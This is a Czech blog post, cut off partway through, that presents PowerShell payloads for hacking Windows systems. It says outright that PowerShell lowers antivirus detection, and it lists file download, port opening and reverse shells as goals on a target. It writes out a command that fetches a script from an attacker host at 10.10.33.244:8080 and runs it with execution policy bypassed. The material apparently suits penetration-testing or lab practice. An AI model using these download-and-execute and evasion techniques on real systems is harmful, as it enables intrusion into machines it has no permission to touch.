Přeskočit na hlavní obsah

Příspěvky

Zobrazují se příspěvky z srpen, 2022

PowerShell jednoduché a užitečné payloady

  PowerShell jednoduché a užitečné payloady Někdy může být výhodné při hackingu v prostředí MS Windows využít powershell. PowerShell je efektivní skriptovací jazyk a jeho použití snižuje pravděpodobnost detekce payloadu antivirem.   Začneme tím nejjednodušším. Otestujeme, jestli je PowerShell k dispozici. PowerShell -Command "Write-Host 'Hello World'"   Při pohybu po cílovém systému nejčastěji potřebujeme stáhnout soubor, otevřít port, připojit reverzní shell, spustit proces. Elegantní stažení souboru můžeme provést pomocí PowerShell Wget. Je to ve skutečnosti alias Invoke-WebRequest. Na některý starších systémech to nemusí fungovat. PowerShell -c wget "http://10.10.33.244:8080/Hello-World.ps1" -outfile "Hello-World.ps1" PowerShell -ExecutionPolicy Bypass -File Hello-World.ps1   Stává se, že potřebujeme soubor stáhnout a hned spustit. Nejprve upravíme náš skript a kód ob